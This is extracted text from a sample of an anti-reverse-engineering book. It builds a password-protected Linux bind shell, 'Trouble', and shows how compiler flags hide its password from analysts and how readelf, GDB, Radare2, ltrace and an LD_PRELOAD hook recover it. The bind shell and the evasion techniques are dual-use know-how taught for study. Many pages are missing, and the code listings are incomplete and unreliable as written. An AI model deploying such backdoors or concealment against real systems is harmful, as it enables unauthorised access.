Anti Reverse Engineering Linux PDF
Anti Reverse Engineering Linux PDF
Techniques
Jacob Baines
This book is for sale at http://leanpub.com/anti-reverse-engineering-linux
This is a Leanpub book. Leanpub empowers authors and publishers with the Lean
Publishing process. Lean Publishing is the act of publishing an in-progress ebook
using lightweight tools and many iterations to get reader feedback, pivot until you
have the right book and build traction once you do.
Preface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Why Read This Book? . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Topics Not Covered . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Prerequisites . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Code and Command Output . . . . . . . . . . . . . . . . . . . . . . . . 2
Chapter 1: Introductions . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Introducing Trouble . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Using CMake . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
The Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Compiling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
Executing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
Accessing the Shell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
Prerequisites
The reader should have access to a Linux host using the x86-64 architecture. The
code for this book was written and tested on Ubuntu 16.04.
This book does discuss the use of IDA, but I understand that the high cost of IDA is
a non-starter for many. Therefore, Ive done my best to also include examples using
Radare2 and Hopper.
Finally, the code for this book is largely written in C with a small amount of x86-
64 assembler. Some of the tooling is written in C++. However, I do not expect the
reader to be well versed in any of these languages. Part of the beauty of having
complete code examples to work from is that it gives the author a chance to point
out any idiosyncrasies and provides the reader the oppurtunity to pull apart the code
on their own time.
The Trouble bind shell is used as an example, not because it is unique or interesting,
but because it is small and simple. It also has a property that should be interesting
to a reverse engineer: it requires a password to access the shell. All of the activity in
this book attempts to either hide or recover the shells password.
Using CMake
Youll be using CMake to compile Trouble. CMake is an open source Makefile
generation tool. Its useful for dependency checking and supports a simple syntax.
Dont worry if you arent familiar with CMake. Youll pick it as the book progresses.
CMake relies on CMakeList.txt files to generate Makefiles. For chapter one, youll
find Troubles CMakeList.txt in the chapt_1_introduction/trouble directory.
http://resources.infosecinstitute.com/icmp-reverse-shell/
https://cmake.org/
Chapter 1: Introductions 4
chap_1_introduction/trouble/CMakeLists.txt
project(trouble C)
cmake_minimum_required(VERSION 3.0)
# This will create a 32 byte "password" for the bind shell. This command
# is only run when "cmake" is run, so if you want to generate a new password
# then "cmake ..; make" should be run from the command line.
exec_program("/bin/sh"
${CMAKE_CURRENT_SOURCE_DIR}
ARGS "-c 'cat /dev/urandom | tr -dc a-zA-Z0-9 | head -c 32'"
OUTPUT_VARIABLE random_password )
# After the build is successful, display the random password to the user
add_custom_command(TARGET ${PROJECT_NAME} POST_BUILD
COMMAND ${CMAKE_COMMAND} -E echo
"The bind shell password is:" ${random_password})
Not only will this file generate Troubles Makefile but it also generates the shells 32
byte password everytime it is executed. The password create using urandom with
the following command:
More will be expalined about using CMake file in the upcoming section about
compiling Trouble.
The Code
The code for the Trouble bind shell is located within the source directory. It is
comprised of a single file:
Chapter 1: Introductions 5
chap_1_introduction/trouble/trouble.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
/**
* This implements a fairly simple bind shell. The server first requires a
* password before allowing access to the shell. The password is currently
* randomly generated each time 'cmake ..' is run. The server has no shutdown
* mechanism so it will run until killed.
*/
int main(int p_argc, char* p_argv[])
{
(void)p_argc;
(void)p_argv;
while (true)
{
int client_sock = accept(sock, NULL, NULL);
if (client_sock < 0)
{
perror("Accept call failed");
return EXIT_FAILURE;
}
if (check_password(password_input))
{
close(client_sock);
return EXIT_FAILURE;
}
Chapter 1: Introductions 7
dup2(client_sock, 0);
dup2(client_sock, 1);
dup2(client_sock, 2);
close(client_sock);
}
}
The code in trouble.c creates a socket and binds to port 1270 before listening for
incoming connections. Once a connection is established the program forks and the
parent process returns back to listening for incoming connections. The child process
reads from the socket for the password. If the password is correct the program uses
execve to provide shell functionality.
Compiling
As previously mentioned, Trouble uses CMake for the build process. If you are using
Ubuntu, CMake is easy to install:
After CMake is installed, youll need to cd into the directory where chapter ones
version of Trouble exists. For me this command looks like this:
Next youll need to create a directory to compile Trouble in. I typically make a
directory called build, but you can name it whatever youd like. After youve
created the build directory cd into it.
Chapter 1: Introductions 8
Now you need to run the cmake command. CMake will check that your system
has the appropriate dependencies installed and then generate the Makefile to build
Trouble. Note that we have to give CMake the path to our CMakeLists.txt file so the
command is cmake ..:
Using cmake ..
albino-lobster@ubuntu:~/antire_book/chap_1_introduction/trouble/build$ cmake ..
-- The C compiler identification is GNU 5.4.0
-- Check for working C compiler: /usr/bin/cc
-- Check for working C compiler: /usr/bin/cc -- works
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Detecting C compile features
-- Detecting C compile features - done
-- Configuring done
-- Generating done
-- Build files have been written to: /home/albino-lobster/antire_book/chap_1_introduc\
tion/trouble/build
Using make
albino-lobster@ubuntu:~/antire_book/chap_1_introduction/trouble/build$ make
Scanning dependencies of target trouble
[ 50%] Building C object CMakeFiles/trouble.dir/src/trouble.c.o
[100%] Linking C executable trouble
The bind shell password is: OXIvZjl4FaUO17UpMUttRE5zn2lUUZqd
[100%] Built target trouble
A new binary named trouble should now exist in the build directory.
Knowing the bind shells password is of utmost importance to its use. As such, the
password is printed to screen every time the binary is generated. In the output above,
Chapter 1: Introductions 9
Executing
Executing Trouble is simple. It doesnt take any command line options and doesnt
require sudo. It should generally only fail if port 1270 is already in use. To run in the
foreground, simply execute ./trouble from the build directory.
albino-lobster@ubuntu:~/antire_book/chap_1_introduction/trouble/build$ ./trouble
The program will block the terminal while it runs. If that is a problem just run it in
the background using &.
Connecting to Trouble
Focusing on GCC
The code in this book expects GCC to be used as the compiler. That is not
to say that Clang or other compilers could not be used. They very well
could be. However, GCC is used since it was the de facto standard for so
many year.
If you are unfamiliar with CMake or GCC you might be wondering what are the
compiler options Im talking about. If you look back at the CMakeLists.txt file from
chapter one youll find this line:
These are the compiler options. GCC supports many such options and maintains
detailed documentation. The flags used in the chapter one version of Trouble are a
tiny subset of what is available.
In the compiler options above, all of the options that start with -W are warning
options that tell the compiler to check for specific types of programming mistakes.
The -g option instructs the compiler to include debugging information in the binary.
Finally, -std=gnu11 tells the compiler that the C code you are using expects the GNU
dialect of the C11 standard for the C programming . The GNU portion enables
extensions that were not part of the C11 standard.
https://gcc.gnu.org/onlinedocs/gcc/Option-Summary.html
https://gcc.gnu.org/onlinedocs/gcc/Warning-Options.html#Warning-Options
https://gcc.gnu.org/onlinedocs/gcc/Debugging-Options.html#Debugging-Options
https://gcc.gnu.org/onlinedocs/gcc/C-Dialect-Options.html#C-Dialect-Options
Chapter 2: Compiler Options 12
-g
As previously mentioned, you can instruct GCC to include debugging information
in your program by using the -g flag. To gain a better understanding of what I mean
by include debugging information use the command line utility readelf on Trouble.
readelf
readelf is a command line utility that understands the Executable and
Linkable Format (ELF). ELF is the standard format for Linux executables,
shared libraries, and core dumps. readelf can parse provided binaries and
display information about their formatting. readelf comes pre-installed on
Ubuntu 16.04.
readelf has a lot of command line options. One option, -S, will display the provided
binarys section headers.
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .interp PROGBITS 0000000000400238 00000238
000000000000001c 0000000000000000 A 0 0 1
[ 2] .note.ABI-tag NOTE 0000000000400254 00000254
0000000000000020 0000000000000000 A 0 0 4
[ 3] .note.gnu.build-i NOTE 0000000000400274 00000274
0000000000000024 0000000000000000 A 0 0 4
[ 4] .gnu.hash GNU_HASH 0000000000400298 00000298
0000000000000064 0000000000000000 A 5 0 8
[ 5] .dynsym DYNSYM 0000000000400300 00000300
0000000000000348 0000000000000018 A 6 1 8
https://en.wikipedia.org/wiki/Executable_and_Linkable_Format
Chapter 2: Compiler Options 13
0000000000000034 0000000000000001 MS 0 0 1
[28] .debug_aranges PROGBITS 0000000000000000 000020dc
0000000000000030 0000000000000000 0 0 1
[29] .debug_info PROGBITS 0000000000000000 0000210c
00000000000005e0 0000000000000000 0 0 1
[30] .debug_abbrev PROGBITS 0000000000000000 000026ec
0000000000000127 0000000000000000 0 0 1
[31] .debug_line PROGBITS 0000000000000000 00002813
0000000000000192 0000000000000000 0 0 1
[32] .debug_str PROGBITS 0000000000000000 000029a5
0000000000000593 0000000000000001 MS 0 0 1
[33] .shstrtab STRTAB 0000000000000000 00003ae8
000000000000014c 0000000000000000 0 0 1
[34] .symtab SYMTAB 0000000000000000 00002f38
0000000000000858 0000000000000018 35 55 8
[35] .strtab STRTAB 0000000000000000 00003790
0000000000000358 0000000000000000 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), l (large)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
Do you see the five sections, beginning at index 28, whose name starts with .debug_
in the output above? These sections contain the debugging information that you
requested by using the -g option. The debugging information is provided in the
DWARF debugging format.
DWARF
DWARF stands for Debugging With Attributed Record Formats and is
the default format GCC uses to store debugging information.
For this book, the most interesting .debug section is .debug_info. You can view the
contents of .debug_info by using the command line utility objdump.
http://dwarfstd.org/
Chapter 2: Compiler Options 15
objdump
objdump displays information about one or more object files. The options
control what particular information to display. This information is mostly
useful to programmers who are working on the compilation tools, as
opposed to programmers who just want their program to compile and
work.
To display the DWARF information in .debug_info use the dwarf=info flag with
objdump. Running this command generates a lot of output so this is one of the rare
occassions in which Ive trimmed the output to focus on specific information.
man objdump
Chapter 2: Compiler Options 16
<5c0> DW_AT_decl_line : 11
<5c1> DW_AT_type : <0x5cf>
<5c5> DW_AT_location : 9 byte block: (DW_OP_addr: 400f00)
The .debug_info section contains useful information for the debugger but its also
useful for anyone attempting to attribute a binary to a specific actor. For example,
in the output above, you can see the full path of the source file (/home/albino-lob-
ster/antire_book/chap_2_compiler/trouble/src/trouble.c), the full path of the compi-
lation directory (/home/albino-lobster/antire_book/chap_2_compiler/trouble/build),
the version of C used (GNU C 5.4.0 20160609), and even the exact line number the
variable s_password was declared on (DW_AT_decl_line: 11).
That might seem like an absurd amount of information, but it can be really useful
when debugging. For example, consider this back trace generated with GDB.
Notice how the backtrace contains the parameter names p_argc and p_argv in
main()? These are the exact names used in Troubles source code. Also, the line
number where accept() is called in trouble.c is visible in the backtrace (line 59).
GDB can display this information thanks to the .debug_info section being present
in Trouble.
Because this information makes debugging so much easier almost every programmer
will use the -g option while writting their program. However, as youll see, its also
useful to reverse engineers.
s_password in objdump
s_password is stored at the virtual address 0x400f00. Convert the virtual address
into a file offset and you can extract the contents of s_password using hexdump.
To convert 0x400f00 into a file offset find the program header the address falls in.
Chapter 2: Compiler Options 18
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
PHDR 0x0000000000000040 0x0000000000400040 0x0000000000400040
0x00000000000001f8 0x00000000000001f8 R E 8
INTERP 0x0000000000000238 0x0000000000400238 0x0000000000400238
0x000000000000001c 0x000000000000001c R 1
[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000
0x00000000000010d4 0x00000000000010d4 R E 200000
LOAD 0x0000000000001e10 0x0000000000601e10 0x0000000000601e10
0x0000000000000298 0x00000000000002c0 RW 200000
DYNAMIC 0x0000000000001e28 0x0000000000601e28 0x0000000000601e28
0x00000000000001d0 0x00000000000001d0 RW 8
NOTE 0x0000000000000254 0x0000000000400254 0x0000000000400254
0x0000000000000044 0x0000000000000044 R 4
GNU_EH_FRAME 0x0000000000000f80 0x0000000000400f80 0x0000000000400f80
0x000000000000003c 0x000000000000003c R 4
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 10
GNU_RELRO 0x0000000000001e10 0x0000000000601e10 0x0000000000601e10
0x00000000000001f0 0x00000000000001f0 R 1
The virtual address for s_password falls in the range for the first LOAD segment
which covers 0x400000 to 0x4010d4. The first LOAD segment starts at the file offset
of 0. Therefore, to calculate s_passwords offset into the file you just need to subtract
0x400000 from 0x400f00. Which means you should be able to find the bind shells
password at 0xf00. Trying displaying it using hexdump.
Chapter 2: Compiler Options 19
In the above output, Ive executed Trouble using GDB. GDB stops at the breakpoint at
the start of main(). I then use GDBs print function to display s_password. It doesnt
get much easier than that!
https://www.hex-rays.com/products/ida/
Chapter 2: Compiler Options 21
check_password() call in C
if (check_password(password_input))
{
close(client_sock);
return EXIT_FAILURE;
}
Notice that password_input and client_sock appear in the disassembly and the C
code? Also, p_password, which is the name check_password() uses for its only param-
eter, appears in the disassembly. IDA has parsed .debug_infos DWARF information
and enriched the disassembly with these easier to understand variable names. As a
reverse engineer this can be really useful since many programmers use contextual
variable names (ie. password_input is where the user submitted password is stored).
Finally, consider how the disassembly around the check_password() call looks
without the debugging information.
Chapter 2: Compiler Options 23
This chunk of disassembly isnt hard to understand, but it was even easier when the
variable names were present!
Malware
Be careful when downloading and analyzing malware
-s
In the previous section you removed the -g flag from Troubles compiler options.
In this section, youll add the -s flag. The -s option stands for strip and GCCs
documentation says this flag will cause the compiler to remove all symbol table
and relocation information from the executable.
To introduce the -s compiler option to Trouble update the compiler options in the
chap_2_compiler/trouble/CMakeLists.txt file.
https://gcc.gnu.org/onlinedocs/gcc/Link-Options.html#Link-Options
Chapter 2: Compiler Options 25
In the output above, you should see two symbol tables: .dynsym (dynamic symbol
table) and .symtab (symbol table). A keen observer would notice two things about
these tables:
These are the first hints as to how these tables are different. Lets look at their section
descriptions. Note that Ive truncated the output for easier comparison of the two
sections.
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 5] .dynsym DYNSYM 0000000000400300 00000300
0000000000000348 0000000000000018 A 6 1 8
[29] .symtab SYMTAB 0000000000000000 000020e0
00000000000007e0 0000000000000018 30 50 8
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), l (large)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
Chapter 2: Compiler Options 29
Focus on the flags column in the output above. The .dynsym section has the A
flag where .symtab has no flags. The A flag means that .dynsym will be loaded into
memory when the program is started. Lacking the A flag means that .symtab is not
loaded into memory and is therefore not necessary to execute the program. You can
safely remove the entire .symtab from the binary.
Even though youve excluded the debugging information from Trouble the symbol
table makes finding and extracting the password trivial. You can use hexdump again.
This can be really useful for a reverse engineer. If you can take this information
straight to Google, GitHub, etc. and find the source code of the binary you are
reversing then life has just become so much easier.
Chapter 2: Compiler Options 30
The FILE symbol points to kaiten.c. If you plug that name into Google, youll find
the source code for numerous versions of a fairly old denial of service IRC bot called
Kaiten.
Stripping Binaries
Using the -s flag is not the only way to strip a binary. We will discuss
other methods later on in the File Format Hacks Chapter
https://malwr.com/analysis/NzU1NWFhMjRlYTRkNDFkNGJlMzU1NDBmNGJjOGE0ZTY/
https://www.virustotal.com/en/file/0e9f8d883f76557efebde8318a0f570a7ad32336b458d701968f84f142846895/analysis/
1477747547/
https://packetstormsecurity.com/files/25575/kaiten.c.html
Chapter 2: Compiler Options 31
Trouble after -s
As you can see the entire .symtab is now gone. Not only does this make the binary
smaller but it also has disabled easy access to s_password and removed the string
trouble.c from the binary altogether.
-fvisibility
These are FUNC symbols that are associted with the main() and check_password()
functions in Trouble. The .dynsym provides both the starting address of the function
as well as its size. These are really useful pieces of information for a dissasembler!
For example, looking at the check_password() function that check_password points
at in Radare2 you can easily find the password.
In case you missed it, at 0x400c1e you can see the the contents of s_password listed
as str.TGOEu26TW0k1b9IeXjUJbT1GfCR0jSnl.
Using -fvisibility=hidden will, by default, hide all possible symbols. That means
that check_password() would be hidden in the chapter two version of Trouble.
Static functions
We also could have hidden the check_password symbol by using the static
keyword in the function definition. In fact, if a function is not going to be
used outside of the file (or translation unit) it is considered best practice
to make the function static.
https://gcc.gnu.org/onlinedocs/gcc-4.6.0/gcc/Code-Gen-Options.html
Chapter 2: Compiler Options 34
If you recompile Trouble after adding the visibility flag and look at .dynsym with
readelf then youll see that both main() and check_password() are no longer present.
Removing main() from Troubles DYNSYM has the interesting side affect that GDB
no longer will be able to break at main().
Radare2 no check_password()
Also, Radare2 wont work with sym.main, but it is clever enough to find main() based
on the ELF entry stub. By using the command pdf @ main in Radare2 you can view
the main() and also find where check_password() is eventually called. Look at how
the call to check_password() has changed due to the use of -fvisibility=hidden.
Notice in the before disassembly the binary clearly makes a call to sym.check_pass-
word whereas the after disassembly makes a call to sub.memcmp_bc6 (an auto-
generated function name). Contrast that to Hopper which outputs the address of
check_password().
Many reverse engineers rely on these function names to provide additional context
to the binary. Without the additional context the reverse engineer is left to figure it
out for themselves.
-O
An often overlooked subject is that of optimization. You control the many ways that
the compiler tries to improve the performance or size of your program through the
optimization flags. There are many flags, so its helpful that GCC has combined
many of them under various -O flags. While there are more -O flags, I believe
the following four are the most useful:
https://gcc.gnu.org/onlinedocs/gcc/Optimize-Options.html
Chapter 2: Compiler Options 37
1. -O1: With -O, the compiler tries to reduce code size and execution time,
without performing any optimizations that take a great deal of compilation
time.
2. -O2: Optimize even more. GCC performs nearly all supported optimizations
that do not involve a space-speed tradeoff.
3. -O3: All optimizations in -O2 plus a handful of others.
4. -Os: All -O2 optimizations that do not typically increase code size. It also
performs further optimizations designed to reduce code size.
chap_2_compiler/tea/CMakeLists.txt
project(tea C)
cmake_minimum_required(VERSION 3.0)
chap_2_compiler/tea/src/tea.c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
/**
* This is an implementation of Corrected Block Tiny Encryption Algorithm (aka
* XXTEA). XXTEA is a simple block cipher designed by David Wheeler and Roger
* Needham that addressed issues in the original BTEA implementation. The
* algorithm was first published in 1998.
*
* The code is based off of the reference code which you can easily find on
* wikipedia: https://en.wikipedia.org/wiki/XXTEA
*
* Note: Do not try to secure your data with this algorithm. This is just a
* toy to illustrate the affects of optimization on code.
*/
sum += 0x9e3779b9;
unsigned e = (sum >> 2) & 3;
y = v[0];
v[n - 1] += MX;
z = v[n - 1];
}
}
int main()
{
char data[] = "abcfefghilmno123";
uint32_t orig_len = strlen(data);
printf("plaintext: ");
if ((orig_len % sizeof(uint32_t)) != 0)
{
printf("Bad size: %lu\n", (orig_len % sizeof(uint32_t)));
return EXIT_FAILURE;
}
To compile tea follow the same steps that you would for Trouble.
Chapter 2: Compiler Options 41
Building tea
albino-lobster@ubuntu:~/antire_book$ cd chap_2_compiler/tea/
albino-lobster@ubuntu:~/antire_book/chap_2_compiler/tea$ mkdir build
albino-lobster@ubuntu:~/antire_book/chap_2_compiler/tea$ cd build/
albino-lobster@ubuntu:~/antire_book/chap_2_compiler/tea/build$ cmake ..
-- The C compiler identification is GNU 5.4.0
-- Check for working C compiler: /usr/bin/cc
-- Check for working C compiler: /usr/bin/cc -- works
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Detecting C compile features
-- Detecting C compile features - done
-- Configuring done
-- Generating done
-- Build files have been written to: /home/albino-lobster/antire_book/chap_2_compiler\
/tea/build
albino-lobster@ubuntu:~/antire_book/chap_2_compiler/tea/build$ make
Scanning dependencies of target tea
[ 50%] Building C object CMakeFiles/tea.dir/src/tea.c.o
[100%] Linking C executable tea
[100%] Built target tea
albino-lobster@ubuntu:~/antire_book/chap_2_compiler/tea/build$ ./tea
plaintext: 0x61 0x62 0x63 0x66 0x65 0x66 0x67 0x68 0x69 0x6c 0x6d 0x6e 0x6f 0x31 0x32\
0x33
encrypted: 0xce 0x8c 0x17 0xa2 0x46 0xf6 0x52 0x54 0x0a 0xed 0xe9 0x82 0xf7 0x27 0x40\
0xfd
albino-lobster@ubuntu:~/antire_book/chap_2_compiler/tea/build$
As you can see from the above, tea doesnt do a whole lot. It writes out the hex version
of abcfefghilmno123 unencrypted and encrypted. However, the functionality of
tea is not the focus here. I want to show you how optimization effects the function
btea_encrypt().
In this section, well be using Hoppers decompiler to view btea_encrypt(). There are
two reasons for this:
1. A decompiler is a really nice feature that you wont often find for free.
2. The disassembly for btea_encrypt() at the -O3 optimization level would take a
few pages so its best to view it in C.
Chapter 2: Compiler Options 42
As you can see, the size of btea_encrypt() without any optimizations is 472 bytes.
This information will be useful when we look at the optimizated versions.
When decompiled by Hopper the function looks like this:
For those not familiar with decompilers, Im sure your response to the decompiled
C is simply whoa. Yes, it is quite ugly. However, given that btea_encrypt relies on
this macro:
-Os
Now lets play with the optimization options. Sometimes its useful to generate the
smallest binary possible. -Os is useful for this because, as previously mentioned, the
optimizations it does emphasize a smaller binary. To compile tea with -Os just add
it to the compiler flags:
After recompiling with -Os and looking at btea_encrypt() in Radare2 youll see that
the function is much smaller now.
Chapter 2: Compiler Options 44
The size of btea_encrypt dropped from 472 bytes to 216! Thats pretty impressive.
How does it look in Hoppers decompiler?
I dont think it looks too signficantly different from the unoptimized version.
However, I would say that this version looks more like the original source code.
Also, you have to consider that less disassembly is better for a reverse engineer. Less
disassembly means fewer lines that need to be understood. This is something you
should keep in mind when optimizing your code for size. Does the benefit of the
smaller code outway the fact that the reverse engineers life is made a little easier?
-O3
-O3 is the second highest optimization level. The highest level, -Ofast, enables some
non-standards compliant optimazations so I generally avoid it. Unlike -Os, -O3 will
not shrink your binary. In fact, it has some optimizations that could make your binary
much larger (for example, -finline-functions).
To build with -O3 you need to change teas compile flags to look like this:
After building the -O3 version of tea then load it into Radare2 and check out the new
size of btea_encrypt().
Chapter 2: Compiler Options 46
The new size of btea_encrypt(), 508 bytes, is not much bigger than the original size
472 bytes. However, the decompiled code is more complicated.
r12 = 0x1;
r8 = 0x0;
do {
rsi = *(int32_t *)r9;
rcx = rbx ^ r8;
r8 = r8 + 0x2;
r9 = r9 + 0x8;
rcx = ((rax >> 0x5 ^ rsi * 0x4) + (rsi >> 0x3 ^ rax << 0x4) ^
(r11 ^ rsi) + (*(int32_t *)(rbp + (rcx & 0x3) * 0x4) ^
rax)) + rdx;
rdx = *(int32_t *)(r9 + 0xfffffffffffffffc);
rax = rbx ^ r12;
r12 = r12 + 0x2;
*(int32_t *)(r9 + 0xfffffffffffffff4) = rcx;
rax = ((rcx << 0x4 ^ rdx >> 0x3) + (rcx >> 0x5 ^ rdx * 0x4) ^
(*(int32_t *)(rbp + (rax & 0x3) * 0x4) ^ rcx) + (r11 ^
rdx)) + rsi;
*(int32_t *)(r9 + 0xfffffffffffffff8) = rax;
} while (r12 < r14);
}
else {
r8 = 0x0;
}
do {
rsi = rdi + r8 * 0x4;
rcx = r8 + 0x1;
r9 = *(int32_t *)(rbp + ((r8 ^ rbx) & 0x3) * 0x4);
rdx = *(int32_t *)(rdi + (r8 + 0x1) * 0x4);
r8 = rcx;
rax = ((rax << 0x4 ^ rdx >> 0x3) + (rax >> 0x5 ^ rdx * 0x4) ^
(r9 ^ rax) + (r11 ^ rdx)) + *(int32_t *)rsi;
*(int32_t *)rsi = rax;
} while (rcx < r13);
rcx = r13;
rsi = *(int32_t *)stack[2042];
}
else {
rsi = rax;
rcx = 0x0;
}
rdx = *(int32_t *)rdi;
rax = ((*(int32_t *)(rbp + ((rbx ^ rcx) & 0x3) * 0x4) ^ rax) + (r11 ^
rdx) ^ (rdx >> 0x3 ^ rax << 0x4) + (rax >> 0x5 ^ rdx * 0x4)) + rsi;
Chapter 2: Compiler Options 48
There really isnt much more to say. Higher optimization levels can generate more
complicated code.
-funroll-loops
If the goal is to produce increasingly long and complicated code then -funroll-loops
is useful. -funroll-loops will unroll or undo the looping structure of any loop whose
iterations can be determined at compile time.
Building on the previous section, you should add -funroll-loops right after -O3.
Now if you recompile and look at the size of btea_encrypt() in Radare2 youll see
that the function has ballooned to 800 bytes!
Consider what youve done to the reverse engineer that needs to understand btea_-
encrypt(). Using -O3 -funroll-loops has nearly doubled the size of the function.
Also, there are more loops and more branching than the original version. Simply by
using the optimization flags available youve increased the work a reverse engineer
will have to do to fully understand this function.
-static
In the previous sections, you learned a number of ways to easily extract the contents
of s_password to gain access to Trouble. However, youve also learned how to use the
compiler options to defeat these s_password extraction techniques. In this section,
youll learn about one last flag to hide s_password from prying eyes.
Notice all of the GLOBAL FUNC symbols that are labeled as undefined (UND) and
have a value of 0? These are functions whose implementations exist in external
libraries that wont be loaded until runtime. Another way to find the functions that
need to be loaded is to look at the binarys relocation information in readelf.
Troubles relocations
Look at memcmp(), one of the functions that needs to be loaded, in GDB before
Trouble has been started and after it has been started.
In the GDB output above, Ive issued two commands info address memcmp and disas
memcmp. Notice that the result of each of these commands points to an address in
Chapter 2: Compiler Options 55
the PLT (procedure linkage table): 0x4009a0. However, if you reissue the commands
after Trouble has begun execution youll find that memcmp() now points into libc.so.
libc.so has been loaded into memory and Trouble now points to the memcmp()
implementation in the shared object.
ltrace
A reasonable person might believe that memcmp() might be used to compare the
password provided by the user and the password embedded in Trouble. In fact, you
can confirm this is the case by using a utility called ltrace.
ltrace
ltrace, or library tracer, is a utility that will display all of the dynamic
library calls that occur while the program is running.
Chapter 2: Compiler Options 56
Towards the end of this trace you can see a call to memcmp() and the first parameter
is the very familiar address of 0x400f00 (aka s_password). ltrace is able to record these
calls by using ptrace to insert breakpoints at the beginning of the loaded functions
. In later chapters, youll learn how to prevent programs that use ptrace to operate
on Trouble. However, for this section just understand that library tracing is a real
problem for Trouble.
LD_PRELOAD
I mentioned that library tracing via ptrace is something you learn to defeat in
later chapters. However, there is another method for printing out the parameters
to memcmp(). By using the dynamic linkers LD_PRELOAD option, you can load
your own library before the other shared objects, like libc.so, are loaded. That means
https://www.kernel.org/doc/ols/2007/ols2007v1-pages-41-52.pdf
man ld.so
Chapter 2: Compiler Options 57
that you can introduce your own code to handle memcmp() and your function will
be executed instead of libc.sos.
Ive written code to prove this out. It can be found in the chapter two directory under
ld_preload. The directory contains two files: CMakeLists.txt and catch_memcmp.c.
chap_2_compiler/ld_preload/CMakeLists.txt
project(catch_memcmp.so C)
cmake_minimum_required(VERSION 3.0)
chap_2_compiler/ld_predload/src/catch_memcmp.c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <dlfcn.h>
/**
* This program, when used with LD_PRELOAD, will print the values passed into
* memcmp and then pass the values to to the real memcmp. Usage:
*
* LD_PRELOAD=./catch_memcmp.so ../../trouble/build/trouble
*/
int memcmp(const void *s1, const void *s2, size_t n)
{
char* new_s1 = calloc(n + 1, 1);
char* new_s2 = calloc(n + 1, 1);
free(new_s1);
free(new_s2);
Chapter 2: Compiler Options 58
// pass the params to the real memcmp and return the result
int (*original_memcmp)(const void *s1, const void *s2, size_t n);
original_memcmp = dlsym(RTLD_NEXT, "memcmp");
return original_memcmp(s1, s2, n);
}
Compiling catch_memcmp.so
albino-lobster@ubuntu:~/antire_book$ cd chap_2_compiler/ld_preload/
albino-lobster@ubuntu:~/antire_book/chap_2_compiler/ld_preload$ mkdir build
albino-lobster@ubuntu:~/antire_book/chap_2_compiler/ld_preload$ cd build/
albino-lobster@ubuntu:~/antire_book/chap_2_compiler/ld_preload/build$ cmake ..
-- The C compiler identification is GNU 5.4.0
-- Check for working C compiler: /usr/bin/cc
-- Check for working C compiler: /usr/bin/cc -- works
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Detecting C compile features
-- Detecting C compile features - done
-- Configuring done
-- Generating done
-- Build files have been written to: /home/albino-lobster/antire_book/chap_2_compiler\
/ld_preload/build
albino-lobster@ubuntu:~/antire_book/chap_2_compiler/ld_preload/build$ make
Scanning dependencies of target catch_memcmp.so
[ 50%] Building C object CMakeFiles/catch_memcmp.so.dir/src/catch_memcmp.c.o
[100%] Linking C executable catch_memcmp.so
[100%] Built target catch_memcmp.so
As you can see, this generates the shared object catch_memcmp.so. This is the shared
object that youll pass to LD_PRELOAD when you execute Trouble. For example:
Chapter 2: Compiler Options 59
albino-lobster@ubuntu:~/antire_book/chap_2_compiler/ld_preload/build$ LD_PRELOAD=./ca\
tch_memcmp.so ../../trouble/build/trouble
With Trouble running, attempt to connect to the bind shell on port 1270 with netcat.
You should input a 32 byte string and hit enter. For example:
You can clearly see s_password and the bogus string I attempted to use in my netcat
connection have been printed out by catch_memcmp.so.
Using musl
If you want to write a truly hardened binary its best to distrust all of the shared
libraries on the system. This is where the -static flag finally comes into play.
According to the GCC documentation, -static prevents linking with the shared
libraries. However, glibc, the libc version shipped with many major Linux distros,
is really not meant to be statically linked. When we do statically link it, some libc
functionality gets broken and it makes our binary significantlly larger. The fact of
the matter is that glibc simply should not be used for static linking. Luckily, there
are other versions of libc that are intended to be statically linked:
https://gcc.gnu.org/onlinedocs/gcc/Link-Options.html
http://www.etalabs.net/compare_libcs.html
Chapter 2: Compiler Options 60
1. diet libc
2. uClibc
3. musl libc
For the remainder of this book we will be using musl (pronounced muscle) libc.
Ive chosen musl because it is actively maintained, its easy to install on Ubuntu, and
it works well with CMake.
To install musl on Ubuntu, use apt-get:
https://www.fefe.de/dietlibc/
https://uclibc.org/
https://www.musl-libc.org/
Chapter 2: Compiler Options 61
To update Trouble to use the -static flag you just update the compiler flags.
Also, you need to tell CMake to use a different compiler. Put the following line right
above the CMAKE_C_FLAGS line:
set(CMAKE_C_COMPILER musl-gcc)
And thats it! Now when you compile Trouble youll be using using musl libc instead
of glibc.
Size matters
I wanted to see the size difference between static linking with glibc and
musl libc. I compiled Trouble using each library and the results are really
telling:
